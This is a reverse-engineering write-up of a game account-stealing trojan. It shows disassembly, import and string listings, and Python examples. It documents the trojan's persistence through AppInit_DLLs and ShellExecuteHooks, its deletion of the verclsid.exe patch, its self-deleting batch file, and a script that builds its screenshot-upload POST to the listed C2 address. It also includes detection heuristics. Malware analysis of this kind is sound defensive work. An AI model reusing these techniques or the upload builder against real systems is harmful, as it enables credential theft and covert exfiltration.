Analysis of a 梦幻 (Fantasy Westward Journey) account-stealing trojan
This post was last edited by bester on 2009-10-24 21:21.
[Target source]: http://www.52pojie.cn/thread-33843-1-1.html
[Tools used]: OllyDbg, LordPE, ImpREC
Load it in OD; it looks packed:
0040B239 > 60 pushad
0040B23A E8 09000000 call 0040B248
0040B23F B7 B0 mov bh, 0xB0
0040B241 0000 add byte ptr [eax], al
0040B243 E9 06020000 jmp 0040B44E
0040B248 33C9 xor ecx, ecx
0040B24A 5E pop esi
0040B24B 870E xchg dword ptr [esi], ecx
0040B24D ^E3 F4 jecxz short 0040B243
First let's see whether it can be unpacked.
Single-stepping through. The loop below is the packer's import-resolution routine: it walks a table of DLL names, calls LoadLibraryA for each one, then resolves every import by name (or by 16-bit ordinal when the entry's first byte has its high bit set) through GetProcAddress and stores the address into the IAT.
0040B409 8B5E 28 mov ebx, dword ptr [esi+0x28] ; KERNEL32.GetProcAddress
0040B40C 56 push esi
0040B40D 52 push edx
0040B40E 8B76 2C mov esi, dword ptr [esi+0x2C]
0040B411 46 inc esi
0040B412 AD lods dword ptr [esi]
0040B413 85C0 test eax, eax
0040B415 5A pop edx
0040B416 74 22 je short 0040B43A
0040B418 03C2 add eax, edx
0040B41A 52 push edx
0040B41B 56 push esi ; 00408004 ASCII "KERNEL32.DLL"
0040B41C 97 xchg eax, edi
0040B41D FF53 FC call dword ptr [ebx-0x4] ; kernel32.LoadLibraryA
0040B420 95 xchg eax, ebp
0040B421 AC lods byte ptr [esi]
0040B422 84C0 test al, al
0040B424 ^75 FB jnz short 0040B421
0040B426 3806 cmp byte ptr [esi], al
0040B428 ^74 E7 je short 0040B411 ; end of this DLL's list: move on to the next DLL module
0040B42A 8BC6 mov eax, esi
0040B42C 79 05 jns short 0040B433 ; high bit clear: import by name (eax = name pointer)
0040B42E 46 inc esi
0040B42F 33C0 xor eax, eax
0040B431 66:AD lods word ptr [esi] ; otherwise import by ordinal
0040B433 50 push eax
0040B434 55 push ebp
0040B435 FF13 call dword ptr [ebx] ; GetProcAddress
0040B437 AB stos dword ptr es:[edi] ; store the resolved API address into the IAT
0040B438 ^EB E7 jmp short 0040B421
Let's look at the IAT:
00404000 77DA7ABB advapi32.RegQueryValueExA
00404004 77DAE9F4 advapi32.RegCreateKeyExA
00404008 77DAEAE7 advapi32.RegSetValueExA
0040400C 77DA6C27 advapi32.RegCloseKey
00404010 77DB793D advapi32.CryptAcquireContextA
00404014 77DB9C71 advapi32.CryptCreateHash
00404018 77DB9A9E advapi32.CryptHashData
0040401C 77DB9DB4 advapi32.CryptGetHashParam
00404020 77DB9BCC advapi32.CryptDestroyHash
00404024 77DB7EEE advapi32.CryptReleaseContext
00404028 77DA7852 advapi32.RegOpenKeyExA
0040402C 00000000
.......
From these APIs we can infer the following actions.
00404000 77DA7ABB advapi32.RegQueryValueExA
00404004 77DAE9F4 advapi32.RegCreateKeyExA
00404008 77DAEAE7 advapi32.RegSetValueExA
0040400C 77DA6C27 advapi32.RegCloseKey
00404028 77DA7852 advapi32.RegOpenKeyExA
These tell us that the program probably manipulates the registry, for example to make itself start automatically.
The next group concerns processes and memory: taking a process snapshot, opening processes, and VirtualAllocEx/WriteProcessMemory, the usual ingredients of code injection:
00404058 7C81CB12 kernel32.ExitProcess
0040405C 7C802213 kernel32.WriteProcessMemory
00404060 7C80BA71 kernel32.VirtualQuery
00404064 7C80BA14 kernel32.UnmapViewOfFile
00404068 7C80B9A5 kernel32.MapViewOfFile
0040406C 7C80950A kernel32.CreateFileMappingA
00404070 7C8650C8 kernel32.Process32Next
00404074 7C864F55 kernel32.Process32First
00404078 7C865C7F kernel32.CreateToolhelp32Snapshot
0040407C 7C801E1A kernel32.TerminateProcess
00404080 7C8309E9 kernel32.OpenProcess
00404084 7C80A874 kernel32.GetLocalTime
00404088 7C809B12 kernel32.VirtualAllocEx
From the APIs below we can tell that this EXE will drop some files onto our hard disk:
004040BC 7C810800 kernel32.CreateFileW
004040C0 7C835D84 kernel32.WritePrivateProfileStringA
004040C4 7C8286EE kernel32.CopyFileA
004040C8 7C814F8A kernel32.GetSystemDirectoryA
004040CC 7C80B56F kernel32.GetModuleFileNameA
004040D0 7C832B86 kernel32.GetPrivateProfileStringA
004040D4 7C801D7B kernel32.LoadLibraryA
004040D8 7C821363 kernel32.GetWindowsDirectoryA
004040DC 7C831EDD kernel32.DeleteFileA
004040E0 7C8106D7 kernel32.CreateThread
004040E4 7C80B741 kernel32.GetModuleHandleA
004040E8 7C802446 kernel32.Sleep
004040EC 7C80FDCD kernel32.GlobalAlloc
004040F0 7C80FFB9 kernel32.GlobalLock
004040F4 7C8021D0 kernel32.ReadProcessMemory
004040F8 7C810B17 kernel32.GetFileSize
004040FC 7C801812 kernel32.ReadFile
00404100 7C801A28 kernel32.CreateFileA
00404104 7C810C2E kernel32.SetFilePointer
00404108 7C810E27 kernel32.WriteFile
0040410C 7C809BE7 kernel32.CloseHandle
00404110 7C809B84 kernel32.VirtualFree
00404114 7C8099C0 kernel32.GetCurrentProcessId
From the APIs below we can guess that it captures screenshots:
00404044 BitBlt gdi32
0040404C CreateCompatibleBitmap gdi32
00404050 CreateCompatibleDC gdi32
0040403C GetDIBits gdi32
These APIs show what this virus is after:
00404164 77D2A5AE user32.EnumWindows
00404168 77D3214A user32.FindWindowExA
0040417C 77D29655 user32.GetWindow
00404180 77D18A80 user32.GetWindowThreadProcessId
00404184 77D3216B user32.GetWindowTextA
00404188 77D2F45F user32.GetClassNameA
0040418C 77D2D1D2 user32.GetDesktopWindow
From the APIs below we can tell that the program connects to the network to send information:
00404194 766C8E07 wininet.InternetWriteFile
00404198 766E3329 wininet.HttpSendRequestExA
0040419C 766940D2 wininet.HttpAddRequestHeadersA
004041A0 76692B01 wininet.HttpOpenRequestA
004041A4 7669345A wininet.InternetConnectA
004041A8 76695796 wininet.InternetOpenA
004041AC 766982F2 wininet.InternetReadFile
004041B0 76694D94 wininet.InternetCloseHandle
004041B4 766E338F wininet.HttpEndRequestA
A few more single steps bring us to the OEP:
00401EEB 57 push edi ; the legendary OEP?
00401EEC E8 BB000000 call 00401FAC
00401EF1 8BF8 mov edi, eax
00401EF3 6A 00 push 0x0 ; I think the OEP should be here.
00401EF5 FF15 E4404000 call dword ptr [0x4040E4] ; kernel32.GetModuleHandleA
00401EFB 3BC7 cmp eax, edi
00401EFD 5F pop edi
00401EFE ^0F85 19FEFFFF jnz 00401D1D
00401F04 ^E9 ACFFFFFF jmp 00401EB5
00401F09 55 push ebp
00401F0A 8BEC mov ebp, esp
00401F0C 51 push ecx
00401F0D 51 push ecx
00401F0E 837D 14 00 cmp dword ptr [ebp+0x14], 0x0
00401F12 0F95C0 setne al
Now let's look at the strings the program references:
Ultra String Reference
Address  Disassembly  Text string
00401045 push 00405688 lb@
004010C7 push 004056F0 wsgame
004011E1 push 00405000 tmprec.dat
0040133B push 00405000 tmprec.dat
004014A2 push 00405724 .bmp
004014B0 mov edi, 00405718 tmpimg.bmp
004014C2 push 00405700 i
004014DA push 004056F8 _s.bmp
0040158E push 00405734 解锁 (unlock)
0040159C push 0040572C 成功 (success)
004015F2 push 00405754 sname
0040162A push 0040574C nlevel
00401662 push 00405744 ncash
0040169A push 0040573C nsaving
004019B4 mov ebx, 0040575C mhmain.dll
00401A6F push 00405000 tmprec.dat
00401AA8 push 00405794 \fonts\
00401ABF push 00405788 aeiofs.dat
00401AD6 push 00405778 encionc_ch.dat
00401AED push 00405768 dnsricip.dat
00401B47 push 004057A0 0
00401B63 push 0040579C 1
00401C5E push 004057A0 0
00401DB2 push 004057F0 kb
00401DC2 push 004057DC %s%s%d%d%d%d%d.dll ; this looks like the name of the DLL the EXE drops; presumably the name varies from run to run.
00401DF5 mov ebx, 004057A0 0
00401E26 mov edi, 004057B4 {9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00401E32 push 0040579C 1
00401E82 push 004057A4 \verclsid.exe
00401EEB push edi (initial cpu selection)
004021D1 push 00405800 wininet
00402208 mov eax, 004057F8 post
0040220F mov eax, 004057F4 get
004023A8 push 00405874 fileupload\n\ncontent-disposition: form-data; name="file1"; filename="%s"\n\ncontent-type: image/bmp\n\n\n\n ; this looks like the body of an HTTP multipart upload; the content type is a bitmap image.
004023B4 mov esi, 00405860 \n\nfileupload--\n\n ; these pieces build the multipart POST that sends the image to the configured URL.
004023CA mov esi, 00405840 referer:
004023E0 mov dword ptr , 00405808 content-type: multipart/form-data;boundary=fileupload
004025B6 push 00405988 appinit_dlls
004025BB push 00405950 software\microsoft\windows nt\currentversion\windows ; there it is, registry manipulation...
004026D0 push 00405934 software\classes\clsid\
004026F0 push 00405924 \inprocserver32
00402724 push 004057B4 {9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00402729 push 004058DC software\microsoft\windows\currentversion\explorer\shellexecutehooks ; more registry manipulation...
0040277E push 004059B8 :repeat\n\ndel "%s"\n\nif exist "%s" goto repeat\n\ndel "c:\del%x.bat"\n\n ; the contents of a batch file are being built...
00402790 push 004059A8 c:\del%x.bat ; a batch file used to delete itself?
0040372E push 00405AC8 bmp
0040373C push 00405AC4 jpg
0040374A push 00405AC0 gif
00403758 push 00405ABC tif
00403766 push 00405AB8 png
004037FB push 00405AD8 - windows 图片和传真查看器 (the window title suffix of the Windows Picture and Fax Viewer)
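To make the upload format behind those strings concrete, here is an added example (written for this write-up, not code from the sample or from the original post). It assembles a multipart/form-data body with the boundary, field name and content type seen above, wraps it in the POST that a wininet HttpOpenRequest/HttpSendRequestEx/InternetWriteFile sequence would produce, and parses such a body back out of a captured request. It assumes standard CRLF framing, which OllyDbg's rendering of the strings as \n\n does not settle; the target URL is the lin.asp address that turns up in the configuration file later in the analysis, and the BMP payload is constructed.

```python
import re
from urllib.parse import urlsplit

BOUNDARY = b"fileupload"                              # boundary string from the sample's strings
UPLOAD_URL = "http://61.164.108.204/mhceshi/lin.asp"   # target URL from the sample's config file

# Constructed payload: a stub BMP (starts with "BM"), standing in for tmpimg.bmp.
SAMPLE_BMP = b"BM" + bytes(14)


def build_upload_body(filename, data, boundary=BOUNDARY):
    """Multipart body in the layout of the sample's format strings (CRLF framing assumed)."""
    crlf = b"\r\n"
    return (b"--" + boundary + crlf
            + b'Content-Disposition: form-data; name="file1"; filename="' + filename.encode() + b'"' + crlf
            + b"Content-Type: image/bmp" + crlf + crlf
            + data + crlf
            + b"--" + boundary + b"--" + crlf)


def build_post(url, body, boundary=BOUNDARY):
    """Full HTTP/1.1 request carrying the multipart body."""
    u = urlsplit(url)
    head = (f"POST {u.path or '/'} HTTP/1.1\r\nHost: {u.netloc}\r\n"
            f"Content-Type: multipart/form-data;boundary={boundary.decode()}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


def parse_multipart(body, boundary):
    """Return one dict per part: name, filename, content_type, data."""
    delim = b"--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        if b"\r\n\r\n" not in chunk:
            continue
        raw_headers, data = chunk.split(b"\r\n\r\n", 1)
        headers = {}
        for line in raw_headers.split(b"\r\n"):
            key, _, value = line.partition(b":")
            headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        disposition = headers.get("content-disposition", "")
        name = re.search(r'(?<!\w)name="([^"]*)"', disposition)
        fname = re.search(r'filename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": fname.group(1) if fname else None,
            "content_type": headers.get("content-type"),
            "data": data[:-2] if data.endswith(b"\r\n") else data,   # drop the CRLF before the next delimiter
        })
    return parts


def is_bmp_upload(request):
    """Detection heuristic for this family's exfil: a POST carrying a multipart part whose body is a BMP."""
    head, sep, body = request.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^\r\n;]+)", head, re.I)
    if not sep or not head.startswith(b"POST ") or not m:
        return False
    return any(p["content_type"] and p["content_type"].lower() == "image/bmp"
               and p["data"].startswith(b"BM")
               for p in parse_multipart(body, m.group(1).strip()))


if __name__ == "__main__":
    req = build_post(UPLOAD_URL, build_upload_body("tmpimg.bmp", SAMPLE_BMP))
    print(req.decode("latin-1"))
    print("bmp upload:", is_bmp_upload(req))
```

The detection side is deliberately loose: it keys on a POST whose multipart part carries image/bmp data beginning with "BM", which is the shape of this sample's upload regardless of the host it is sent to.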
At this point I think we can tackle the analysis of this program from three angles:
1: What files does it drop and what does it do with them; which registry entries does it change (no service-related APIs were found, so services are left aside for now).
2: What does it mainly target, and how does it operate (we already know it is a 梦幻 account-stealing trojan; the main point is to analyse how it steals the account).
3: How does it send the stolen information back, and where to.
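Before following those three threads, the triage done by eye above (imports plus string references mapped to likely behaviour) can be written down as a script. This is an added example for this write-up, not code from the original post: the import and string lists are copied from the listings above (plus the kernel32 calls WinExec, GetTickCount and GetEnvironmentVariableA that appear later in the disassembly), while the rule table is my own heuristic and is an assumption, not a published signature set.

```python
import re

# Constructed input: the import names recovered from the IAT in the post (subset shown there,
# plus the kernel32 calls that appear later in the listing).
IMPORTS = {
    "RegQueryValueExA", "RegCreateKeyExA", "RegSetValueExA", "RegCloseKey", "RegOpenKeyExA",
    "CryptAcquireContextA", "CryptCreateHash", "CryptHashData", "CryptGetHashParam",
    "ExitProcess", "WriteProcessMemory", "VirtualQuery", "UnmapViewOfFile", "MapViewOfFile",
    "CreateFileMappingA", "Process32Next", "Process32First", "CreateToolhelp32Snapshot",
    "TerminateProcess", "OpenProcess", "GetLocalTime", "VirtualAllocEx",
    "CreateFileW", "WritePrivateProfileStringA", "CopyFileA", "GetSystemDirectoryA",
    "GetModuleFileNameA", "GetPrivateProfileStringA", "LoadLibraryA", "GetWindowsDirectoryA",
    "DeleteFileA", "CreateThread", "GetModuleHandleA", "Sleep", "ReadProcessMemory",
    "CreateFileA", "WriteFile", "CloseHandle", "GetCurrentProcessId",
    "BitBlt", "CreateCompatibleBitmap", "CreateCompatibleDC", "GetDIBits",
    "EnumWindows", "FindWindowExA", "GetWindow", "GetWindowThreadProcessId",
    "GetWindowTextA", "GetClassNameA", "GetDesktopWindow",
    "InternetWriteFile", "HttpSendRequestExA", "HttpAddRequestHeadersA", "HttpOpenRequestA",
    "InternetConnectA", "InternetOpenA", "InternetReadFile", "InternetCloseHandle", "HttpEndRequestA",
    "WinExec", "GetTickCount", "GetEnvironmentVariableA",
}

# Constructed input: the string references listed in the post (subset).
STRINGS = [
    "wsgame", "tmprec.dat", "tmpimg.bmp", "mhmain.dll", "%s%s%d%d%d%d%d.dll",
    "{9b1ae382-2647-4c4a-a313-b36b6ca34bd7}", "\\verclsid.exe",
    'fileupload\\n\\ncontent-disposition: form-data; name="file1"; filename="%s"',
    "content-type: multipart/form-data;boundary=fileupload",
    "appinit_dlls", "software\\microsoft\\windows nt\\currentversion\\windows",
    "software\\classes\\clsid\\", "\\inprocserver32",
    "software\\microsoft\\windows\\currentversion\\explorer\\shellexecutehooks",
    ':repeat\\n\\ndel "%s"\\n\\nif exist "%s" goto repeat', "c:\\del%x.bat",
]

# Heuristic rule table (my assumption): a capability fires when at least min_ratio of its
# APIs are imported, or when any of its string patterns is present.
RULES = {
    "registry persistence": dict(apis={"RegOpenKeyExA", "RegSetValueExA", "RegCreateKeyExA", "RegQueryValueExA"},
                                 strings=[r"appinit_dlls", r"shellexecutehooks", r"\\inprocserver32$"]),
    "process enumeration": dict(apis={"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}),
    "cross-process memory access": dict(apis={"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}),
    "screen capture": dict(apis={"BitBlt", "CreateCompatibleDC", "CreateCompatibleBitmap", "GetDIBits"}),
    "window hunting": dict(apis={"EnumWindows", "FindWindowExA", "GetClassNameA", "GetWindowTextA"},
                           strings=[r"^wsgame$"]),
    "http upload": dict(apis={"InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestExA", "InternetWriteFile"},
                        strings=[r"multipart/form-data", r"content-disposition: form-data"]),
    "file drop": dict(apis={"GetWindowsDirectoryA", "GetModuleFileNameA", "CopyFileA", "WritePrivateProfileStringA"}),
    "self-delete via batch": dict(apis={"WinExec", "DeleteFileA"}, strings=[r"^:repeat", r"^c:\\del%x\.bat$"]),
    "patch tampering": dict(apis=set(), strings=[r"verclsid\.exe"]),
}


def triage(imports, strings, rules=RULES, min_ratio=0.75):
    """Map (imports, strings) to the capabilities they suggest, with the evidence for each."""
    findings = {}
    for capability, rule in rules.items():
        apis = rule.get("apis", set())
        api_hits = sorted(a for a in apis if a in imports)
        str_hits = [s for s in strings if any(re.search(p, s, re.I) for p in rule.get("strings", []))]
        api_ok = bool(apis) and len(api_hits) / len(apis) >= min_ratio
        if api_ok or str_hits:
            findings[capability] = {"apis": api_hits, "strings": str_hits}
    return findings


if __name__ == "__main__":
    for capability, evidence in triage(IMPORTS, STRINGS).items():
        print(f"{capability}: {len(evidence['apis'])} APIs, {len(evidence['strings'])} strings")
```

A triage like this only orders the questions; every line of the rest of the post is the confirmation that the imports alone cannot give.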
Without further ado, let's look at the entry at the OEP:
00401EEB > 57 push edi ; OEP
00401EEC E8 BB000000 call 00401FAC
00401EF1 8BF8 mov edi, eax
00401EF3 6A 00 push 0x0
00401EF5 FF15 E4404000 call dword ptr [<&kernel32.GetModuleHandleA>] ; kernel32.GetModuleHandleA
00401EFB 3BC7 cmp eax, edi
00401EFD 5F pop edi
00401EFE ^0F85 19FEFFFF jnz 00401D1D ; this distinguishes how the program was started: if it was loaded as a DLL, jump away; otherwise it was started as an EXE.
00401F04 ^E9 ACFFFFFF jmp 00401EB5
OK, at this point we can guess the overall structure of the program: it supports two modes of operation, running as an EXE and running as a DLL. (Presumably 00401FAC returns the base of the module containing this code; GetModuleHandleA(NULL) is the base of the process's main executable, so the two match only when the file was started as the EXE.)
Let's first run it as an EXE.
Loading the unpacked program, we look at the application again from the start:
00401EB4 C3 retn
00401EB5 33C0 xor eax, eax
00401EB7 90 nop
00401EB8 40 inc eax
00401EB9 83F8 FF cmp eax, -0x1
00401EBC ^72 F9 jb short 00401EB7 ; busy-wait delay loop: counts eax up to 0xFFFFFFFE
00401EBE 8325 68624000 00 and dword ptr [0x406268], 0x0
00401EC5 E8 CBFBFFFF call 00401A95
{
00401A95 56 push esi
00401A96 57 push edi
00401A97 BE 5C5F4000 mov esi, 00405F5C ; ASCII "C:\WINDOWS\Fonts\"
00401A9C 68 04010000 push 0x104
00401AA1 56 push esi
00401AA2 FF15 D8404000 call dword ptr [<&kernel32.GetWindowsDirectoryA>] ; kernel32.GetWindowsDirectoryA
00401AA8 68 94574000 push 00405794 ; \fonts\
00401AAD 56 push esi
00401AAE E8 251F0000 call <jmp.&msvcrt._mbscat>
00401AB3 BF 64614000 mov edi, 00406164 ; ASCII "C:\WINDOWS\Fonts\AeioFs.dat"
00401AB8 56 push esi
00401AB9 57 push edi
00401ABA E8 0D1F0000 call <jmp.&msvcrt._mbscpy>
00401ABF 68 88574000 push 00405788 ; aeiofs.dat
00401AC4 57 push edi
00401AC5 E8 0E1F0000 call <jmp.&msvcrt._mbscat>
00401ACA BF 60604000 mov edi, 00406060 ; ASCII "C:\WINDOWS\Fonts\Encionc_ch.dat"
00401ACF 56 push esi
00401AD0 57 push edi
00401AD1 E8 F61E0000 call <jmp.&msvcrt._mbscpy>
00401AD6 68 78574000 push 00405778 ; encionc_ch.dat
00401ADB 57 push edi
00401ADC E8 F71E0000 call <jmp.&msvcrt._mbscat>
00401AE1 56 push esi
00401AE2 BE 585E4000 mov esi, 00405E58 ; ASCII "C:\WINDOWS\Fonts\DNSRicip.dat"
00401AE7 56 push esi
00401AE8 E8 DF1E0000 call <jmp.&msvcrt._mbscpy>
00401AED 68 68574000 push 00405768 ; dnsricip.dat
00401AF2 56 push esi
00401AF3 E8 E01E0000 call <jmp.&msvcrt._mbscat>
00401AF8 83C4 38 add esp, 0x38
00401AFB 5F pop edi
00401AFC 5E pop esi
00401AFD C3 retn
This routine only builds the paths (the Fonts directory plus the three .dat names); two more .dat files appear here. Never mind their contents for now, let's carry on with the analysis.
}
00401ECA 68 60604000 push 00406060 ; ASCII "C:\WINDOWS\Fonts\Encionc_ch.dat"
00401ECF E8 B1120000 call 00403185 ; loads the contents of the configuration file
{
....
00403104 8D85 F8FEFFFF |lea eax, dword ptr [ebp-0x108] ; the target URL obtained from the config data: ASCII "http://61.164.108.204/mhceshi/lin.asp"
0040310A 50 |push eax
0040310B A1 BC654000 |mov eax, dword ptr [0x4065BC]
00403110 03C3 |add eax, ebx
00403112 50 |push eax
00403113 E8 B4080000 |call <jmp.&msvcrt._mbscpy>
00403118 8D45 B8 |lea eax, dword ptr [ebp-0x48]
0040311B 50 |push eax
0040311C A1 BC654000 |mov eax, dword ptr [0x4065BC]
00403121 8D8403 80000000 |lea eax, dword ptr [ebx+eax+0x80]
00403128 50 |push eax
00403129 E8 9E080000 |call <jmp.&msvcrt._mbscpy>
0040312E 8D85 78FFFFFF |lea eax, dword ptr [ebp-0x88]
00403134 50 |push eax
00403135 A1 BC654000 |mov eax, dword ptr [0x4065BC]
0040313A 8D8403 A0000000 |lea eax, dword ptr [ebx+eax+0xA0]
00403141 50 |push eax
00403142 E8 85080000 |call <jmp.&msvcrt._mbscpy>
00403147 8D45 98 |lea eax, dword ptr [ebp-0x68]
0040314A 50 |push eax
0040314B A1 BC654000 |mov eax, dword ptr [0x4065BC]
00403150 8D8403 C0000000 |lea eax, dword ptr [ebx+eax+0xC0]
00403157 50 |push eax
00403158 E8 6F080000 |call <jmp.&msvcrt._mbscpy>
0040315D 83C4 20 |add esp, 0x20
00403160 FF45 F8 |inc dword ptr [ebp-0x8]
00403163 81C3 E0000000 |add ebx, 0xE0
00403169 FF45 FC |inc dword ptr [ebp-0x4]
0040316C 837D FC 64 |cmp dword ptr [ebp-0x4], 0x64
00403170 ^0F8C 04FFFFFF \jl 0040307A ; this loop loads the whole configuration file into memory: at most 0x64 (100) entries of 0xE0 bytes each, four strings per entry.
00403176 8B45 F8 mov eax, dword ptr [ebp-0x8]
00403179 5F pop edi
0040317A A3 C0654000 mov dword ptr [0x4065C0], eax ; save the number of keys
0040317F 5E pop esi
00403180 5B pop ebx
00403181 C9 leave
00403182 C2 0400 retn 0x4
00403185 55 push ebp
}
00401ED4 E8 ADFEFFFF call 00401D86
{
00401D86 /$ 55 push ebp
00401D87 |. 8BEC mov ebp, esp
00401D89 |. 81EC A0040000 sub esp, 0x4A0
00401D8F |. 53 push ebx
00401D90 |. 56 push esi
00401D91 |. 8D45 F0 lea eax, dword ptr [ebp-0x10] ; SYSTEMTIME
00401D94 |. 57 push edi
00401D95 |. 50 push eax ; /pLocaltime
00401D96 |. FF15 84404000 call dword ptr [<&kernel32.GetLocalTime>] ; \GetLocalTime
00401D9C |. 0FB745 FC movzx eax, word ptr [ebp-0x4] ; wSecond
00401DA0 |. 50 push eax ; /<%d>
00401DA1 |. 0FB745 FA movzx eax, word ptr [ebp-0x6] ; |wMinute
00401DA5 |. 50 push eax ; |<%d>
00401DA6 |. 0FB745 F8 movzx eax, word ptr [ebp-0x8] ; |wHour
00401DAA |. 50 push eax ; |<%d>
00401DAB |. 0FB745 F6 movzx eax, word ptr [ebp-0xA] ; |wDay
00401DAF |. 50 push eax ; |<%d>
00401DB0 |. 6A 00 push 0x0 ; |<%d> = 0
00401DB2 |. 68 F0574000 push 004057F0 ; |kb
00401DB7 |. 68 5C5F4000 push 00405F5C ; |<%s> = "C:\WINDOWS\Fonts\"
00401DBC |. 8D85 6CFEFFFF lea eax, dword ptr [ebp-0x194] ; |
00401DC2 |. 68 DC574000 push 004057DC ; |%s%s%d%d%d%d%d.dll
00401DC7 |. 50 push eax ; |s
00401DC8 |. FF15 28414000 call dword ptr [<&msvcrt.sprintf>] ; \sprintf
Stack:
0012FAEC 0012FE28 ASCII "C:\WINDOWS\Fonts\kb02412355.dll"
0012FAF0 004057DC ASCII "%s%s%d%d%d%d%d.dll"
0012FAF4 00405F5C ASCII "C:\WINDOWS\Fonts\"
0012FAF8 004057F0 ASCII "kb"
So the name is not random: it is "kb", a literal 0, and the day, hour, minute and second of the local time, read from the SYSTEMTIME at [ebp-0x10] (here 0, 24, 12, 3, 55, i.e. the 24th at 12:03:55).
Continuing:
00401DE2 |. BF 64614000 mov edi, 00406164 ; ASCII "C:\WINDOWS\Fonts\AeioFs.dat"
00401DE7 |. BE 04010000 mov esi, 0x104
00401DEC |. 8D85 60FBFFFF lea eax, dword ptr [ebp-0x4A0]
00401DF2 |. 57 push edi ; /IniFileName => "C:\WINDOWS\Fonts\AeioFs.dat"
00401DF3 |. 56 push esi ; |BufSize => 104 (260.)
00401DF4 |. 50 push eax ; |ReturnBuffer
00401DF5 |. BB A0574000 mov ebx, 004057A0 ; |0
00401DFA |. 68 74644000 push 00406474 ; |Default = ""
00401DFF |. 8D85 70FFFFFF lea eax, dword ptr [ebp-0x90] ; |
00401E05 |. 53 push ebx ; |Key => "0"
00401E06 |. 50 push eax ; |Section
00401E07 |. FF15 D0404000 call dword ptr [<&kernel32.GetPrivateProfileStringA>] ; \GetPrivateProfileStringA
00401E0D |. 8D85 6CFEFFFF lea eax, dword ptr [ebp-0x194]
00401E13 |. 57 push edi ; /FileName => "C:\WINDOWS\Fonts\AeioFs.dat"
00401E14 |. 50 push eax ; |String
00401E15 |. 8D85 70FFFFFF lea eax, dword ptr [ebp-0x90] ; |
00401E1B |. 53 push ebx ; |Key => "0"
00401E1C |. 8B1D C0404000 mov ebx, dword ptr [<&kernel32.WritePrivateProfileStringA>] ; |kernel32.WritePrivateProfileStringA
00401E22 |. 50 push eax ; |Section
00401E23 |. FFD3 call ebx ; \WritePrivateProfileStringA
00401E25 |. 57 push edi ; /FileName => "C:\WINDOWS\Fonts\AeioFs.dat"
00401E26 |. BF B4574000 mov edi, 004057B4 ; |{9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00401E2B |. 57 push edi ; |String => "{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}"
00401E2C |. 8D85 70FFFFFF lea eax, dword ptr [ebp-0x90] ; |
00401E32 |. 68 9C574000 push 0040579C ; |1
00401E37 |. 50 push eax ; |Section
00401E38 |. FFD3 call ebx ; \WritePrivateProfileStringA
Stack:
0012FAF8 0012FF2C |Section = "0"
0012FAFC 004057A0 |Key = "0"
0012FB00 00406474 |Default = ""
0012FB04 0012FB1C |ReturnBuffer = 0012FB1C
0012FB08 00000104 |BufSize = 104 (260.)
0012FB0C 00406164 \IniFileName = "C:\WINDOWS\Fonts\AeioFs.dat"
Let's look at this configuration file:
0=C:\WINDOWS\Fonts\kb0241295.dll
1={9B1AE382-2647-4c4a-A313-B36B6CA34BD7}
Note the order: the old value of key 0 (the DLL name written by a previous run, kb0241295.dll here) is read into a buffer first; only then is key 0 overwritten with the new name and key 1 with the CLSID.
Continuing:
00401E40 |. 56 push esi ; /BufSize => 104 (260.)
00401E41 |. 50 push eax ; |PathBuffer
00401E42 |. 6A 00 push 0x0 ; |hModule = NULL
00401E44 |. FF15 CC404000 call dword ptr [<&kernel32.GetModuleFileNameA>] ; \GetModuleFileNameA
00401E4A |. 8D85 6CFEFFFF lea eax, dword ptr [ebp-0x194]
00401E50 |. 6A 00 push 0x0 ; /FailIfExists = FALSE
00401E52 |. 50 push eax ; |NewFileName
00401E53 |. 8D85 64FCFFFF lea eax, dword ptr [ebp-0x39C] ; |
00401E59 |. 50 push eax ; |ExistingFileName
00401E5A |. FF15 C4404000 call dword ptr [<&kernel32.CopyFileA>] ; \CopyFileA
Stack:
0012FB04 0012FC20 |ExistingFileName = "C:\Documents and Settings\Administrator\桌面\谔谔\Unpacked.exe"
0012FB08 0012FE28 |NewFileName = "C:\WINDOWS\Fonts\kb02412355.dll"
0012FB0C 00000000 \FailIfExists = FALSE
00401E66 |. 6A 01 push 0x1
00401E68 |. 50 push eax
00401E69 >|. E8 E7010000 call 00402055 ; creates a file mapping to load the DLL into memory.
00401E6E |. 8D85 68FDFFFF lea eax, dword ptr [ebp-0x298]
00401E74 |. 56 push esi ; /BufSize
00401E75 |. 50 push eax ; |Buffer
00401E76 |. FF15 C8404000 call dword ptr [<&kernel32.GetSystemDirectoryA>] ; \GetSystemDirectoryA
00401E7C |. 8D85 68FDFFFF lea eax, dword ptr [ebp-0x298]
00401E82 |. 68 A4574000 push 004057A4 ; /\verclsid.exe
00401E87 |. 50 push eax ; |dest
00401E88 |. E8 4B1B0000 call <jmp.&msvcrt._mbscat> ; \strcat
00401E8D |. 59 pop ecx
00401E8E |. 8D85 68FDFFFF lea eax, dword ptr [ebp-0x298]
00401E94 |. 59 pop ecx
00401E95 |. 50 push eax ; /FileName
00401E96 |. FF15 DC404000 call dword ptr [<&kernel32.DeleteFileA>] ; \DeleteFileA
It builds the path of verclsid.exe in the system directory and deletes that file.
The program did not drop this EXE, so it should not be part of the virus, and the name does not look like a loader either. Let's look it up on Baidu:
http://baike.baidu.com/view/1493045.htm?fr=ala0
From that we learn this EXE is part of a vulnerability patch: verclsid.exe is the shell-extension verifier that Explorer runs before loading shell extensions such as the ShellExecuteHooks entry set up below, which is presumably why the trojan removes it.
OK, so far we know:
1: The program's main file directory is C:\WINDOWS\Fonts\
2: The EXE is copied into that directory under a DLL name of the form "kb<local time digits>.dll".
3: A configuration file named AeioFs.dat records the DLL name and the ID.
4: The program deletes a patch component: verclsid.exe.
